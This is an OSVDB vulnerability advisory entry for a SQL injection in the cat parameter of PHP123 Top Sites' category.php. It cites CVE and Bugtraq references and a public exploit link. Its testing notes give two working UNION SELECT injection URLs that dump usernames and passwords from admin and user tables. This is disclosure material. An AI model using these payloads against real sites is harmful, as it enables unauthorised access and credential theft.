PHP123 Top Sites category.php cat Variable SQL Injection

2007-07-28T00:00:00
ID OSVDB:37130
Type osvdb
Reporter OSVDB
Modified 2007-07-28T00:00:00

Description

Manual Testing Notes

http://[target]/category.php?cat=-1//UNION//ALL//SELECT//1,concat(username,0x3a,password),3,4,5//FROM//admin/
http://[target]/category.php?cat=-1//UNION//ALL//SELECT//1,concat(username,0x3a,password),3,4,5//FROM//users/

References:

ISS X-Force ID: 35679
Generic Exploit URL: http://www.milw0rm.com/exploits/4241
FrSIRT Advisory: ADV-2007-2693
CVE-2007-4054
Bugtraq ID: 25128